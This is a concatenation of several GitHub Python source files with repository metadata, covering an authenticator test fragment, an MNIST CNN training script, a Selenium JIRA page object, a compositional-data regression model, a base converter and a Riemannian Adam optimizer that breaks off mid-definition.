authenticator.unregister_session(session_id)
sessions = authenticator.get_member_sessions(member_id)
assert len(sessions) == len(last_sessions) - 1
authenticator.invalidate_member(member_id)
sessions = authenticator.get_member_sessions(member_id)
assert len(sessions) == 0
| UTF-8 | Python | false | false | 8,987 | py | 10 | test_stateful_authenticator.py | 6 | 0.579615 | 0.551352 | 0 | 315 | 27.530159 | 79 |
ustcllh/MLUtility | 2,791,728,771,848 | 6b218a42d899ffec775c591103e2df49ee9046e9 | c90e7363b9b76615e2d60834fa272d6dd505cc53 | /digit_recognition_conv.py | 6c836559c7fadbc53d9e6c03f8e0ffeab3b99bef | []
| no_license | https://github.com/ustcllh/MLUtility | 7ee2e3d19945ed46a1d4d0bbee7396170c0e13fd | 0f252799fd3545aebd3a793117dc6381c6a4bd68 | refs/heads/master | 2021-08-19T23:04:58.176333 | 2021-06-11T17:18:40 | 2021-06-11T17:18:40 | 185,864,825 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import torch
import torch.nn as nn
import torchvision
from torchvision import transforms
import torch.nn.functional as F
# Neural Network with CNN + pooling layers
# note: dropout layers are disabled, please check nn.Dropout2d() for information
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.maxpool1 = nn.MaxPool2d(kernel_size=2)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.maxpool2 = nn.MaxPool2d(kernel_size=2)
#self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.maxpool1(self.conv1(x)))
#x = self.relu(self.maxpool2(self.conv2_drop(self.conv2(x))))
x = self.relu(self.maxpool2(self.conv2(x)))
x = x.view(-1, 320)
x = self.relu(self.fc1(x))
#x = self.conv2_drop(x)
x = self.fc2(x)
return self.relu(x)
def main():
# check cpu/gpu usage
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
#torch.backends.cudnn.enabled
# training dataset + dataloader
train_dataset = torchvision.datasets.MNIST(root='./data', train=True, transform=transforms.ToTensor(), download=True)
train_loader = torch.utils.data.DataLoader(dataset=train_dataset, num_workers=4, batch_size=1000, shuffle=True)
# validation dataset + dataloader
valid_dataset = torchvision.datasets.MNIST(root='./data', train=False, transform=transforms.ToTensor(),download = True)
valid_loader = torch.utils.data.DataLoader(dataset=valid_dataset, num_workers=4, batch_size=1000, shuffle=False)
# hyper parameters
input_size = 784
hidden_size = 500
output_size = 10
num_epochs = 5
learning_rate = 0.001
# initiate a neural network
model = Net()
model = model.to(device)
print(model)
# loss function
lossFunction = nn.CrossEntropyLoss()
# learnable parameters optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
total_step = len(train_loader)
# loop over epochs
for epoch in range(num_epochs):
# loop over training dataset
for i, (images,labels) in enumerate(train_loader):
# move data from main memory to device (cpu/gpu) associated memory
images = images.to(device)
labels = labels.to(device)
# output and loss
out = model(images)
loss = lossFunction(out,labels)
# adjust learnable parameters
optimizer.zero_grad()
loss.backward()
optimizer.step()
# calculate accuracy with validation dataset
corr = 0.;
total = 0.;
for j, (valid_images, valid_labels) in enumerate(valid_loader):
valid_images = valid_images.to(device)
valid_labels = valid_labels.to(device)
out = model(valid_images)
corr += (out.argmax(dim=1)==valid_labels).sum().item()
total += len(valid_labels)
accuracy = 100.00 * corr / total
print('Epoch [{}/{}], Accuracy[Corr/Total]: [{}/{}] = {:.2f} %' .format(epoch+1, num_epochs, corr, total, accuracy))
# saving model
model_path = './digit_recognizer_cnn.pt'
torch.save(model.state_dict(), model_path)
# initiate a new neural network
model_valid = Net()
# load a well-trained network
model_valid.load_state_dict(torch.load(model_path, map_location='cuda:0'))
model_valid.to(device)
# use the well-trained network and calculate accuracy
corr=0
total=0
for j, (valid_images, valid_labels) in enumerate(valid_loader):
valid_images = valid_images.to(device)
valid_labels = valid_labels.to(device)
out = model_valid(valid_images)
corr += (out.argmax(dim=1)==valid_labels).sum().item()
total += len(valid_labels)
accuracy = 100.00 * corr / total
print('Validation Accuracy[Corr/Total]: [{}/{}] = {:.2f} %' .format(corr, total, accuracy))
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 4,224 | py | 4 | digit_recognition_conv.py | 3 | 0.621686 | 0.600142 | 0 | 127 | 32.244094 | 124 |
sergiievdokimov/AQA-Python-Odessa | 781,684,089,426 | 4c1cc0bd1702a2e3baeb2b91c6b09012bbdf2057 | 87669859027f45fde819b8c1cd25e26aad414e99 | /src/pages/create_issue_page.py | 1bdc89ef7b82ee3498d816ac42b1f2a692e75773 | []
| no_license | https://github.com/sergiievdokimov/AQA-Python-Odessa | 9d2148a7f3317ece514348b21ebbdc2c62d160a3 | d945faa411c1fcfe67223b407ea708a02819bcf5 | refs/heads/master | 2022-12-15T04:16:41.466798 | 2019-06-03T08:53:52 | 2019-06-03T08:53:52 | 179,825,140 | 0 | 0 | null | false | 2022-12-08T01:43:51 | 2019-04-06T11:31:53 | 2019-06-03T08:53:54 | 2022-12-08T01:43:50 | 27 | 0 | 0 | 5 | Python | false | false | from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from src.pages.base_page import BasePage
class CreateIssuePage(BasePage):
PROJECT_FIELD = (By.ID, "project-field")
ISSUE_TYPE = (By.ID, "issuetype-field")
SUMMARY = (By.ID, "summary")
DESCRIPTION = (By.CSS_SELECTOR, ".mce-container")
PRIORITY = (By.ID, "priority-field")
LABELS = (By.ID, "labels-textarea")
ASSIGNEE = (By.ID, "assignee-field")
EPIC = (By.ID, "customfield_10000-field")
CREATE_ISSUE_SUBMIT_BUTTON_ID = (By.ID, "create-issue-submit")
CANCEL_BUTTON_ID = (By.CSS_SELECTOR, "a.cancel")
SUBMISSION_ERROR = (By.CSS_SELECTOR, ".error")
ISSUE_SUCCESSFULLY_CREATED_MESSAGE = (By.ID, "aui-flag-container")
def __init__(self, driver):
self.driver = driver
def set_project(self, project_name):
if project_name is not None:
self.driver.find_element(*self.PROJECT_FIELD).clear()
self.driver.find_element(*self.PROJECT_FIELD).send_keys(project_name)
self.driver.find_element(*self.PROJECT_FIELD).send_keys(Keys.ENTER)
WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(self.CREATE_ISSUE_SUBMIT_BUTTON_ID))
def set_issue_type(self, type_name):
if type_name is not None:
self.driver.find_element(*self.ISSUE_TYPE).clear()
self.driver.find_element(*self.ISSUE_TYPE).send_keys(type_name)
self.driver.find_element(*self.ISSUE_TYPE).send_keys(Keys.ENTER)
WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(self.CREATE_ISSUE_SUBMIT_BUTTON_ID))
def set_summary(self, summary):
if summary is not None:
self.driver.find_element(*self.SUMMARY).send_keys(summary)
def set_description(self, description):
if description is not None:
self.driver.find_element(*self.DESCRIPTION).click()
self.driver.find_element(*self.DESCRIPTION).send_keys(description)
def set_priority(self, priority_name):
if priority_name is not None:
WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(self.CREATE_ISSUE_SUBMIT_BUTTON_ID))
self.driver.find_element(*self.PRIORITY).location_once_scrolled_into_view
self.driver.find_element(*self.PRIORITY).clear()
self.driver.find_element(*self.PRIORITY).send_keys(priority_name)
self.driver.find_element(*self.PRIORITY).send_keys(Keys.ENTER)
def set_assignee(self, assignee):
if assignee is not None:
self.driver.find_element(*self.ASSIGNEE).location_once_scrolled_into_view
self.driver.find_element(*self.ASSIGNEE).clear()
self.driver.find_element(*self.ASSIGNEE).send_keys(assignee)
self.driver.find_element(*self.ASSIGNEE).send_keys(Keys.ENTER)
def click_submit_button(self):
self.driver.find_element(*self.CREATE_ISSUE_SUBMIT_BUTTON_ID).click()
def click_cancel_button(self):
self.driver.find_element(*self.CANCEL_BUTTON_ID).click()
def at_page(self):
return self.is_element_visible(self.CREATE_ISSUE_SUBMIT_BUTTON_ID) & ("Create Issue - Hillel IT School JIRA" in self.driver.title)
def is_successful_message_displayed(self):
return self.is_element_visible(self.ISSUE_SUCCESSFULLY_CREATED_MESSAGE)
def is_submission_error_displayed(self):
return self.is_element_visible(self.SUBMISSION_ERROR)
def create_issue(self, project_name, issue_type, summary, description, priority, assignee):
self.set_project(project_name)
self.set_issue_type(issue_type)
self.set_summary(summary)
self.set_description(description)
self.set_priority(priority)
self.set_assignee(assignee)
self.click_submit_button()
def accept_alert(self):
self.driver.switch_to.alert.accept()
| UTF-8 | Python | false | false | 4,083 | py | 28 | create_issue_page.py | 24 | 0.683076 | 0.680382 | 0 | 89 | 44.876404 | 138 |
Ebedthan/clv | 6,047,313,963,548 | 6e294948529c0bbce966f4cbdfb153eda2c31f43 | ba3e6545257173f1e73f7d3ccb315862e951a4d2 | /linear_alr.py | 5ba938e3abc9033811f702b837f6eed53e690a5f | [
"MIT"
]
| permissive | https://github.com/Ebedthan/clv | b5b4a82807cf93946e0c1d6d81baba089be87cba | c184cd5f98a8f471f9e6131c88e7c9cf7717cf47 | refs/heads/master | 2023-03-18T19:14:08.495785 | 2021-01-25T15:14:58 | 2021-01-25T15:14:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import sys
from scipy.special import logsumexp
from scipy.stats import linregress
from scipy.integrate import RK45, solve_ivp
from timeout import *
def choose_denom(P):
"""Pick a denominator for additive log-ratio transformation.
"""
np.seterr(divide="ignore", invalid="ignore")
log_change = None
for p in P:
s = p.sum(axis=1,keepdims=True)
s[s==0] = 1
deltas = np.log( (p/s)[1:] ) - np.log( (p/s)[:-1] )
if log_change is None:
log_change = deltas
else:
log_change = np.vstack((log_change, deltas))
np.seterr(divide="warn", invalid="warn")
# pick taxon with smallest change in log proportion
min_idx = -1
min_var = np.inf
ntaxa = log_change.shape[1]
for i in range(ntaxa):
if not np.all(np.isfinite(log_change[:,i])):
continue
var = np.var(log_change[:,i])
if var < min_var:
min_idx = i
min_var = var
if min_idx == -1:
print("Error: no valid denominator found", file=sys.stderr)
exit(1)
return min_idx
def construct_alr(P, denom, pseudo_count=1e-3):
"""Compute the additive log ratio transformation with a given
choice of denominator. Assumes zeros have been replaced with
nonzero values.
"""
ALR = []
ntaxa = P[0].shape[1]
numer = np.array([i for i in range(ntaxa) if i != denom])
for p in P:
p = np.copy(p)
p = (p + pseudo_count) / (p + pseudo_count).sum(axis=1,keepdims=True)
alr = (np.log(p[:,numer]).T - np.log(p[:,denom])).T
ALR.append(alr)
return ALR
class LinearALR:
"""Inference for the linear model under the additive log-ratio transformation
"""
def __init__(self, P=None, T=None, U=None, denom=None, pseudo_count=1e-3):
"""
Parameters
----------
P : A list of T_x by D dimensional numpy arrays of
estimated relative abundances.
T : A list of T_x by 1 dimensional numpy arrays giving
the times of each observation x.
U : An optional list of T_x by P numpy arrays of external
perturbations for each x.
denom : integer id for taxa in denominator of log ratio
"""
self.P = P
self.T = T
if P is not None and denom is None:
self.denom = choose_denom(P)
self.X = construct_alr(P, self.denom, pseudo_count)
elif P is not None and denom is not None:
self.denom = denom
self.X = construct_alr(P, denom, pseudo_count)
else:
self.X = None
if U is None and self.X is not None:
self.U = [ np.zeros((x.shape[0], 1)) for x in self.X ]
self.no_effects = True
else:
self.U = U
self.no_effects = False
# Parameter estimates
self.A = None
self.g = None
self.B = None
self.Q_inv = np.eye(self.P[0].shape[1]-1) if P is not None else None
# Regularization parameters
self.alpha = None
self.r_A = None
self.r_g = None
self.r_B = None
def get_regularizers(self):
return self.alpha, self.r_A, self.r_g, self.r_B
def set_regularizers(self, alpha, r_A, r_g, r_B):
self.alpha = alpha
self.r_A = r_A
self.r_g = r_g
self.r_B = r_B
def train(self, verbose=False, folds=10):
"""Estimate regularization parameters and CLV model parameters.
"""
if self.alpha is None or self.r_A is None or self.r_g is None or self.r_B is None:
if verbose:
print("Estimating regularizers...")
self.alpha, self.r_A, self.r_g, self.r_B = estimate_elastic_net_regularizers_cv(self.X, self.P, self.U, self.T, self.denom, folds=folds, no_effects=self.no_effects, verbose=verbose)
if verbose:
print("Estimating model parameters...")
self.A, self.g, self.B = elastic_net_alr(self.X, self.U, self.T, self.Q_inv, self.alpha, self.r_A, self.r_g, self.r_B)
if verbose:
print()
def predict(self, p0, times, u = None):
"""Predict relative abundances from initial conditions.
Parameters
----------
p0 : the initial observation, a D-dim numpy array
times : a T by 1 numpy array of sample times
u : a T by P numpy array of external perturbations
Returns
-------
y_pred : a T by D numpy array of predicted relative
abundances. Since we cannot predict initial
conditions, the first entry is set to the array
of -1.
"""
if u is None:
u = np.zeros((times.shape[0], 1))
if p0.ndim == 1:
p0 = p0.reshape((1, p0.size))
X = construct_alr([p0], self.denom)
x = X[0]
return predict(x, p0, u, times, self.A, self.g, self.B, self.denom)
def get_params(self):
A = np.copy(self.A)
g = np.copy(self.g)
B = np.copy(self.B)
return A, g, B
def elastic_net_alr(X, U, T, Q_inv, alpha, r_A, r_g, r_B, tol=1e-3, verbose=False, max_iter=10000):
def gradient(AgB, x_stacked, pgu_stacked):
f = x_stacked - AgB.dot(pgu_stacked.T).T
grad = Q_inv.dot(f.T.dot(pgu_stacked))
# l2 regularization terms
A = AgB[:,:yDim]
g = AgB[:,yDim:(yDim+1)]
B = AgB[:,(yDim+1):]
grad[:,:yDim] += -2*alpha*(1-r_A)*A
grad[:,yDim:(yDim+1)] += -2*alpha*(1-r_g)*g
grad[:,(yDim+1):] += -2*alpha*(1-r_B)*B
return -grad
def generalized_gradient(AgB, grad, step):
nxt_AgB = prv_AgB - step*grad
# threshold A
A_prox = nxt_AgB[:,:yDim]
A_prox[A_prox < -step*alpha*r_A] += step*alpha*r_A
A_prox[A_prox > step*alpha*r_A] -= step*alpha*r_A
A_prox[np.logical_and(A_prox >= -step*alpha*r_A, A_prox <= step*alpha*r_A)] = 0
# threshold g
g_prox = nxt_AgB[:,yDim:(yDim+1)]
g_prox[g_prox < -step*alpha*r_g] += step*alpha*r_g
g_prox[g_prox > step*alpha*r_g] -= step*alpha*r_g
g_prox[np.logical_and(g_prox >= -step*alpha*r_g, g_prox <= step*alpha*r_g)] = 0
# threshold B
B_prox = nxt_AgB[:,(yDim+1):]
B_prox[B_prox < -step*alpha*r_B] += step*alpha*r_B
B_prox[B_prox > step*alpha*r_B] -= step*alpha*r_B
B_prox[np.logical_and(B_prox >= -step*alpha*r_B, B_prox <= step*alpha*r_B)] = 0
AgB_proximal = np.zeros(AgB.shape)
AgB_proximal[:,:yDim] = A_prox
AgB_proximal[:,yDim:(yDim+1)] = g_prox
AgB_proximal[:,(yDim+1):] = B_prox
return (AgB - AgB_proximal)/step
def objective(AgB, x_stacked, pgu_stacked):
f = x_stacked - AgB.dot(pgu_stacked.T).T
obj = -0.5*(f.dot(Q_inv)*f).sum()
return -obj
def stack_observations(X, U, T):
# number of observations by xDim
x_stacked = None
# number of observations by xDim + 1 + uDim
pgu_stacked = None
for x, u, times in zip(X, U, T):
for t in range(1, times.size):
dt = times[t] - times[t-1]
xt0 = x[t-1]
gt0 = np.ones(1)
ut0 = u[t-1]
pgu = np.concatenate((xt0, gt0, ut0))
if x_stacked is None:
x_stacked = x[t] - x[t-1]
pgu_stacked = dt*pgu
else:
x_stacked = np.vstack((x_stacked, x[t] - x[t-1]))
pgu_stacked = np.vstack((pgu_stacked, dt*pgu))
return x_stacked, pgu_stacked
xDim = X[0].shape[1]
yDim = xDim + 1
uDim = U[0].shape[1]
A,g,B = ridge_regression_alr(X, U, T, np.max((alpha*(1-r_A), 0.01)), np.max((alpha*(1-r_g), 0.01)), np.max((alpha*(1-r_B), 0.01)))
AgB = np.zeros(( xDim, xDim + 1 + uDim ))
AgB[:,:xDim] = A
AgB[:,xDim:(xDim+1)] = np.expand_dims(g,axis=1)
AgB[:,(xDim+1):] = B
x_stacked, pgu_stacked = stack_observations(X, U, T)
prv_obj = np.inf
obj = objective(AgB, x_stacked, pgu_stacked)
it = 0
while np.abs(obj - prv_obj) > tol:
np.set_printoptions(suppress=True)
prv_AgB = np.copy(AgB)
prv_obj = obj
# line search
step = 0.1
grad = gradient(prv_AgB, x_stacked, pgu_stacked)
gen_grad = generalized_gradient(prv_AgB, grad, step)
nxt_AgB = prv_AgB - step*gen_grad
obj = objective(nxt_AgB, x_stacked, pgu_stacked)
while obj > prv_obj - step*(grad*gen_grad).sum() + step*0.5*np.square(gen_grad).sum():
step /= 2
gen_grad = generalized_gradient(prv_AgB, grad, step)
nxt_AgB = prv_AgB - step*gen_grad
obj = objective(nxt_AgB, x_stacked, pgu_stacked)
A = nxt_AgB[:,:yDim]
g = nxt_AgB[:,yDim:(yDim+1)]
B = nxt_AgB[:,(yDim+1):]
AgB[:,:yDim] = A
AgB[:,yDim:(yDim+1)] = g
AgB[:,(yDim+1):] = B
obj = objective(AgB, x_stacked, pgu_stacked)
it += 1
if verbose:
print("\t", it, obj)
if it > max_iter:
print("Warning: maximum number of iterations ({}) reached".format(max_iter), file=sys.stderr)
break
A = AgB[:,:xDim]
g = AgB[:,xDim:(xDim+1)].flatten()
B = AgB[:,(xDim+1):]
return A, g, B
def ridge_regression_alr(X, U, T, r_A=0, r_g=0, r_B=0):
"""Computes estimates of A, g, and B using least squares.
Parameters
----------
X : a list of T x yDim-1 numpy arrays
U : a list of T x uDim numpy arrays
T : a list of T x 1 numpy arrays with the time of each observation
Returns
-------
"""
xDim = X[0].shape[1]
yDim = xDim + 1
uDim = U[0].shape[1]
AgB_term1 = np.zeros(( xDim, xDim + 1 + uDim ))
AgB_term2 = np.zeros(( xDim + 1 + uDim, xDim + 1 + uDim))
for idx, (xi, ui) in enumerate(zip(X, U)):
for t in range(1, xi.shape[0]):
pt = xi[t]
pt0 = xi[t-1]
xt = xi[t]
xt0 = xi[t-1]
gt0 = np.ones(1)
ut0 = ui[t-1]
pgu = np.concatenate((pt0, gt0, ut0))
delT = T[idx][t] - T[idx][t-1]
AgB_term1 += np.outer( (xt - xt0) / delT, pgu)
AgB_term2 += np.outer(pgu, pgu)
reg = np.array([r_A for i in range(xDim)] + [r_g] + [r_B for i in range(uDim)])
reg = np.diag(reg)
AgB = AgB_term1.dot(np.linalg.pinv(AgB_term2 + reg))
A = AgB[:,:xDim]
g = AgB[:,xDim:(xDim+1)].flatten()
B = AgB[:,(xDim+1):]
return A, g, B
def estimate_elastic_net_regularizers_cv(X, P, U, T, denom, folds, no_effects=False, verbose=False):
if len(X) == 1:
print("Error: cannot estimate regularization parameters from single sample", file=sys.stderr)
exit(1)
elif len(X) < folds:
folds = len(X)
rs = [0.1, 0.5, 0.7, 0.9, 1]
alphas = [0.1, 1, 10]
alpha_rA_rg_rB = []
for alpha in alphas:
for r_A in rs:
for r_g in rs:
if no_effects:
alpha_rA_rg_rB.append((alpha, r_A, r_g, 0))
else:
for r_B in rs:
alpha_rA_rg_rB.append((alpha, r_A, r_g, r_B))
np.set_printoptions(suppress=True)
best_r = 0
best_sqr_err = np.inf
for i, (alpha, r_A, r_g, r_B) in enumerate(alpha_rA_rg_rB):
#print("\tTesting regularization parameter set", i+1, "of", len(alpha_rA_rg_rB), file=sys.stderr)
sqr_err = 0
for fold in range(folds):
train_X = []
train_P = []
train_U = []
train_T = []
test_X = []
test_P = []
test_U = []
test_T = []
for i in range(len(X)):
if i % folds == fold:
test_X.append(X[i])
test_P.append(P[i])
test_U.append(U[i])
test_T.append(T[i])
else:
train_X.append(X[i])
train_P.append(P[i])
train_U.append(U[i])
train_T.append(T[i])
Q_inv = np.eye(train_X[0].shape[1])
A, g, B = elastic_net_alr(train_X, train_U, train_T, Q_inv, alpha, r_A, r_g, r_B, tol=1e-3)
sqr_err += compute_prediction_error(test_X, test_P, test_U, test_T, A, g, B, denom)
if sqr_err < best_sqr_err:
best_r = (alpha, r_A, r_g, r_B)
best_sqr_err = sqr_err
print("\tr", (alpha, r_A, r_g, r_B), "sqr error", sqr_err)
np.set_printoptions(suppress=False)
return best_r
def compute_rel_abun(x, denom):
if x.ndim == 1:
x = np.expand_dims(x, axis=0)
z = np.hstack((x, np.zeros((x.shape[0], 1))))
p = np.exp(z - logsumexp(z, axis=1, keepdims=True))
for i in range(p.shape[1]-1, denom, -1):
tmp = np.copy(p[:,i-1])
p[:,i-1] = np.copy(p[:,i])
p[:,i] = tmp
return p
@timeout(5)
def predict(x, p, u, times, A, g, B, denom):
"""Make predictions from initial conditions
"""
def grad_fn(A, g, B, u):
def fn(t, x):
return g + A.dot(x) + B.dot(u)
return fn
p_pred = np.zeros((times.shape[0], x[0].size+1))
pt = p[0]
xt = x[0]
for i in range(1, times.shape[0]):
grad = grad_fn(A, g, B, u[i-1])
dt = times[i] - times[i-1]
ivp = solve_ivp(grad, (0,0+dt), xt, method="RK45")
xt = ivp.y[:,-1]
pt = compute_rel_abun(xt, denom).flatten()
p_pred[i] = pt
return p_pred
def compute_prediction_error(X, P, U, T, A, g, B, denom_ids):
def compute_err(p, p_pred):
err = 0
ntaxa = p.shape[1]
#err += np.mean(np.square(p[1:] - p_pred[1:]).sum(axis=1))
err += np.square(p[1:] - p_pred[1:]).sum()
return err/ntaxa
err = 0
for x, p, u, t in zip(X, P, U, T):
try:
p_pred = predict(x, p, u, t, A, g, B, denom_ids)
err += compute_err(p, p_pred)
except TimeoutError:
err += np.inf
return err/len(X)
| UTF-8 | Python | false | false | 14,463 | py | 32 | linear_alr.py | 17 | 0.506534 | 0.492083 | 0 | 456 | 30.717105 | 193 |
ajayasocean/learnSdet | 11,287,174,085,306 | 8e8e190ac02cefd4c6f11aa638d8bc98d18de0d9 | 56d6987ffcc49ccd1446cfbcfc63e3e1294fca41 | /pythonBasicsOld/dictMethods.py | 109171ea131d843c03316ca3a5b1735b655bf2b1 | []
| no_license | https://github.com/ajayasocean/learnSdet | 6b6139459d6488c40f665f4b3e75fbba408deba8 | b22c1a9356730ba31d3b782393d4487c5e32fcd9 | refs/heads/master | 2023-06-14T08:33:08.569432 | 2021-07-09T20:11:15 | 2021-07-09T20:11:15 | 376,581,573 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # dictionary methods
# copy() method
avng1 ={'iron-man':'Tony', 'Cap':'Steve','BW':'Natasha'}
avng2 = avng1.copy()
print('copy of aveng1 is',avng2)
# Understanding copy vs assigment
a1 = {'iron-man':"Tony", "CA":"Steve","BW":"Natasha"}
a2 = a1
print(a2)
cw = a1.copy()
print(cw)
print('id of a1',id(a1))
print('id of a2',id(a2))
print('id of cw',id(cw))
print(a1)
a1['hulk']='Bruce-Banner'
print(a1)
print(a2)
print(cw)
##print(cw['hulk'])
# get() method
print('get having a default message',a1.get('iron-man',"not found"))
print(a1.get('panther',"not found"))
print('get having no default message', a1.get('black'))
# setdefault(); syntax: dict.setdefault(key1, default=None)
print('Current dict a1', a1)
print('New item', a1.setdefault('hulk', 'Unknown'))
print('Current dict a1', a1)
print('Another item', a1.setdefault('strange', 'unknow'))
print('Current dict a1', a1)
print('one more item', a1.setdefault('panther'))
print('Current dict a1', a1)
| UTF-8 | Python | false | false | 960 | py | 141 | dictMethods.py | 124 | 0.667708 | 0.633333 | 0 | 40 | 23 | 68 |
jerrysun21/python_cmd_line_convert | 4,174,708,235,071 | d095b65cbe1ac98b3e4801a99ab262552cf92454 | 965a65402cad98fcf60492e482c596ebbb30c308 | /cnvt.py | f5f316fff5a8df3b97c527a8c44e9ef8b37c4ce3 | []
| no_license | https://github.com/jerrysun21/python_cmd_line_convert | a410a97510933aace4644bcc5f02ea65ab1b1876 | b89cc9c1bb2f1b970cefd175e01138d9c1b5221e | refs/heads/master | 2020-05-30T20:11:56.345159 | 2012-11-20T16:29:52 | 2012-11-20T16:29:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
import argparse
import sys
def parseInput(in_type, in_num):
if (in_type == 'bh' or in_type == 'bd'):
try:
int(in_num, 2)
return True
except ValueError:
return False
elif (in_type == 'hb' or in_type == 'hd'):
try:
int(in_num, 16)
return True
except ValueError:
return False
elif (in_type == 'dh' or in_type == 'db'):
return True
else:
return False
parser = argparse.ArgumentParser(description="Converts bin/hex/dec numbers, does not work for negatives or floats ")
parser.add_argument('direction',
metavar='type',
default='hd',
help='Specifies the conversion method, decimal to binary (db), decimal to hex (db), hex to bin (hb), hex to dec (hd), bin to dec (bd), bin to hex (bh)')
parser.add_argument('input',
metavar='input',
type=int,
help="Input number, must match the conversion-to base (don't need 0x for hex)")
args=parser.parse_args()
cnvt_type = args.direction
if (parseInput(cnvt_type, str(args.input))):
if (cnvt_type == 'bh'):
print 'IN (bin): ' + str(args.input)
print 'OUT (hex): ' + hex(int(str(args.input), 2))
elif (cnvt_type == 'bd'):
print 'IN (bin): ' + str(args.input)
print 'OUT (dec): ' + int(str(args.input), 2)
elif (cnvt_type == 'dh'):
print 'IN (dec): ' + str(args.input)
print 'OUT (hex): ' + hex(args.input)
elif (cnvt_type == 'db'):
print 'IN (dec): ' + str(args.input)
print 'OUT (bin): ' + bin(args.input)
elif (cnvt_type == 'hd'):
print 'IN (hex): ' + str(args.input)
print 'OUT (dec): ' + str(int(str(args.input), 16))
elif (cnvt_type == 'hb'):
print 'IN (hex): ' + str(args.input)
print 'OUT (bin): ' + str(int(str(args.input), 2))
else:
sys.exit("Invalid conversion type") | UTF-8 | Python | false | false | 1,921 | py | 2 | cnvt.py | 1 | 0.559604 | 0.554919 | 0 | 59 | 31.576271 | 156 |
kekmodel/geoopt | 19,052,474,926,064 | 2ca0e9a2eea6b1e81225d7319c49d47bbea7a6df | 0b0c6885f40219689ce4b1859248612db00b9795 | /geoopt/optim/radam.py | 6c90b16a4ccc18df1d596394fc444aef0295b5ca | [
"Apache-2.0"
]
| permissive | https://github.com/kekmodel/geoopt | bb2a060cc28784a3a051e71d953313cd65e43d7a | 7f4f54ca44f175f47030965ef2fdaae92eb59f8b | refs/heads/master | 2020-04-17T10:33:37.117862 | 2019-01-18T11:38:36 | 2019-01-18T11:38:36 | 166,505,241 | 1 | 0 | null | true | 2019-01-19T04:18:00 | 2019-01-19T04:18:00 | 2019-01-18T11:38:39 | 2019-01-18T11:40:44 | 85 | 0 | 0 | 0 | null | false | null | import torch.optim
from .mixin import OptimMixin
from .tracing import create_traced_update
from ..tensor import ManifoldParameter, ManifoldTensor
from ..manifolds import Euclidean
class RiemannianAdam(OptimMixin, torch.optim.Adam):
r"""Riemannian Adam with the same API as :class:`torch.optim.Adam`
Parameters
----------
params : iterable
iterable of parameters to optimize or dicts defining
parameter groups
lr : float (optional)
learning rate (default: 1e-3)
betas : Tuple[float, float] (optional)
coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps : float (optional)
term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay : float (optional)
weight decay (L2 penalty) (default: 0)
amsgrad : bool (optional)
whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
(default: False)
Other Parameters
----------------
stabilize : int
Stabilize parameters if they are off-manifold due to numerical
reasons every ``stabilize`` steps (default: ``None`` -- no stabilize)
.. _On the Convergence of Adam and Beyond:
https://openreview.net/forum?id=ryQu7f-RZ
"""
def step(self, closure=None):
"""Performs a single optimization step.
Arguments
---------
closure : callable (optional)
A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
with torch.no_grad():
for group in self.param_groups:
if "step" not in group:
group["step"] = 0
betas = self.group_param_tensor(group, "betas")
weight_decay = self.group_param_tensor(group, "weight_decay")
eps = self.group_param_tensor(group, "eps")
learning_rate = self.group_param_tensor(group, "lr")
amsgrad = group["amsgrad"]
for p in group["params"]:
if p.grad is None:
continue
if isinstance(p, (ManifoldParameter, ManifoldTensor)):
manifold = p.manifold
else:
manifold = Euclidean()
if p.grad.is_sparse:
raise RuntimeError(
"Adam does not support sparse gradients, please consider SparseAdam instead"
)
state = self.state[p]
# State initialization
if len(state) == 0:
state["step"] = torch.tensor(0)
# Exponential moving average of gradient values
state["exp_avg"] = torch.zeros_like(p)
# Exponential moving average of squared gradient values
inner_prod_shape = p.shape
if manifold.ndim > 0:
inner_prod_shape = inner_prod_shape[: -manifold.ndim]
state["exp_avg_sq"] = torch.zeros(
inner_prod_shape, dtype=p.dtype, device=p.device
)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state["max_exp_avg_sq"] = torch.zeros(
inner_prod_shape, dtype=p.dtype, device=p.device
)
# this is assumed to be already transported
if "traced_step" not in state:
if amsgrad:
state["traced_step"] = create_traced_update(
self.perform_step,
manifold,
p,
weight_decay.type_as(p),
betas.type_as(p),
eps.type_as(p),
state["step"],
state["exp_avg"],
state["exp_avg_sq"],
state["max_exp_avg_sq"],
amsgrad=True,
)
else:
state["traced_step"] = create_traced_update(
self.perform_step,
manifold,
p,
weight_decay.type_as(p),
betas.type_as(p),
eps.type_as(p),
state["step"],
state["exp_avg"],
state["exp_avg_sq"],
max_exp_avg_sq=None,
amsgrad=False,
)
if amsgrad:
state["traced_step"](
p,
p.grad,
learning_rate.type_as(p),
weight_decay.type_as(p),
betas.type_as(p),
eps.type_as(p),
state["step"],
state["exp_avg"],
state["exp_avg_sq"],
state["max_exp_avg_sq"],
)
else:
state["traced_step"](
p,
p.grad,
learning_rate.type_as(p),
weight_decay.type_as(p),
betas.type_as(p),
eps.type_as(p),
state["step"],
state["exp_avg"],
state["exp_avg_sq"],
)
group["step"] += 1
if self._stabilize is not None and group["step"] % self._stabilize == 0:
self.stabilize_group(group)
return loss
@staticmethod
def perform_step(
manifold,
point,
grad,
lr,
weight_decay,
betas,
eps,
step,
exp_avg,
exp_avg_sq,
max_exp_avg_sq,
